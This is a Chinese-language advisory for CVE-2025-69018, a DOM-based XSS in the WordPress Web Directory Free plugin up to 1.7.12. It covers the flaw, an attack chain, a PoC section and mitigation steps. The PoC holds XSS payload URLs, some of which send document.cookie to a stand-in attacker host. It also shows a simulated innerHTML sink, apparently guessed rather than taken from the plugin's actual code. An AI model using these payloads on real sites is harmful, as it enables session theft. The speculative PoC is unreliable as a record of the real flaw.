CVE-2025-69018 WordPress Web Directory Free插件DOM型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-69018

漏洞类型

DOM型跨站脚本攻击(XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Shamalli Web Directory Free (WordPress插件)

漏洞概述

CVE-2025-69018是WordPress平台下Shamalli Web Directory Free插件中的一个DOM型跨站脚本(XSS)漏洞。该漏洞存在于Web页面生成过程中，由于对用户输入的不当处理，导致攻击者可以在受害者的浏览器中执行恶意JavaScript代码。Web Directory Free是一款用于创建Web目录的WordPress插件，广泛应用于各类网站。当插件在处理用户提交的数据时，未能正确地对特殊字符进行HTML转义或编码，使得攻击者可以通过构造特定的payload注入恶意脚本。由于该漏洞属于DOM型XSS，攻击载荷直接在客户端被解析执行，无需服务器端响应，因此传统的WAF防护可能难以检测。该漏洞影响版本从n/a至1.7.12的所有版本，CVSS评分6.5，属于中等严重程度。攻击者需要诱导用户访问包含恶意脚本的页面才能成功利用此漏洞。

技术细节

DOM型跨站脚本漏洞是一种特殊类型的XSS攻击，其特点在于恶意脚本的解析和执行完全在客户端浏览器中进行。在Web Directory Free插件中，漏洞可能存在于插件的前端JavaScript代码中，该代码直接使用document.write()、innerHTML或其他不安全的DOM操作方法来处理用户可控的数据。当插件从URL参数、Cookie或DOM元素中获取数据并直接输出到页面时，如果未经过适当的输入验证和输出编码，攻击者就可以注入恶意JavaScript代码。典型的攻击场景是：攻击者构造一个包含XSS payload的URL链接，如包含<script>alert(document.cookie)</script>或使用img标签的onerror事件等。当受害者点击该链接时，恶意脚本会被浏览器解析执行，从而实现会话劫持、敏感信息窃取或钓鱼攻击等目的。由于DOM型XSS的执行完全在客户端进行，服务器端的日志和防护设备可能无法检测到恶意请求。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress Web Directory Free插件版本（<=1.7.12）

STEP 2

步骤2

攻击者构造包含XSS payload的恶意URL，如在搜索参数中注入<script>标签或事件处理器

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他方式诱导受害者点击恶意链接

STEP 4

步骤4

受害者浏览器访问目标页面时，插件的JavaScript代码直接解析并执行URL中的恶意payload

STEP 5

步骤5

恶意脚本在受害者浏览器上下文中执行，可窃取会话Cookie、劫持用户会话或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-69018 PoC - DOM-based XSS in Web Directory Free Plugin
// Target: WordPress Web Directory Free Plugin <= 1.7.12

// Attack Vector: Crafted URL with XSS payload
// Payload can be injected through URL parameters that are processed client-side

// Example malicious URL:
// https://target-site.com/?s=<img src=x onerror=alert(document.cookie)>

// Another payload example:
// https://target-site.com/?search_term=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

// JavaScript PoC to demonstrate DOM-based XSS:
(function(){
    // Simulate the vulnerable code pattern
    var userInput = location.href.split('s=')[1] || '';
    // Vulnerable: Direct DOM manipulation without sanitization
    document.getElementById('search-results').innerHTML = userInput;
    
    // In real attack, this would exfiltrate session cookies
    // fetch('https://attacker-controlled-site.com/log?data=' + encodeURIComponent(document.cookie));
})();

// Recommended testing:
// 1. Install Web Directory Free plugin version <= 1.7.12
// 2. Navigate to a page with search functionality
// 3. Append ?s=<script>alert('XSS')</script> to URL
// 4. Observe if alert popup appears (confirms vulnerability)

影响范围

Web Directory Free <= 1.7.12

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 禁用或删除Web Directory Free插件；2) 使用WAF（Web应用防火墙）规则阻止包含常见XSS payload的请求；3) 通过.htaccess或服务器配置添加URL参数过滤规则；4) 限制用户对搜索功能的访问权限；5) 启用HTTPOnly和Secure标志保护Cookie；6) 监控网站访问日志以检测潜在的恶意请求。建议在可行时尽快升级到插件的最新安全版本。